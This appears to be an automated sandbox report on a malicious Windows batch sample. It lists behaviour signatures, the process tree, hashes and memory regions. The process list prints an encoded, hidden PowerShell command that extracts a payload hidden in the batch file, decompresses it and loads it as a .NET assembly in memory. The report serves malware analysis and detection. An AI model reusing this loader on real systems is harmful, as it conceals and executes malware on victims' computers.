| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat"
C:\Windows\system32\attrib.exe
attrib +s +h "C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat".exe
C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe
"C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat".exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgABmVKgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwAZlScAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAbQBlAHQAaABvAGQASQBuAGYAbwAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgACQAaQBuAHMAdABhAG4AYwBlACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4AQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAJABtAGUAdABoAG8AZABJAG4AZgBvAC4ATgBhAG0AZQApADsAIAAkAG0AZQB0AGgAbwBkAEkAbgBmAG8ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
C:\Windows\system32\attrib.exe
attrib -s -h "C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat".exe
Network
Files
C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe
| MD5 | 852d67a27e454bd389fa7f02a8cbe23f |
| SHA1 | 5330fedad485e0e4c23b2abe1075a1f984fde9fc |
| SHA256 | a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8 |
| SHA512 | 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d |
memory/2836-5-0x000007FEF589E000-0x000007FEF589F000-memory.dmp
memory/2836-6-0x000000001B400000-0x000000001B6E2000-memory.dmp
memory/2836-7-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp
memory/2836-8-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp
memory/2836-9-0x0000000001CB0000-0x0000000001CB8000-memory.dmp
memory/2836-10-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp
memory/2836-11-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp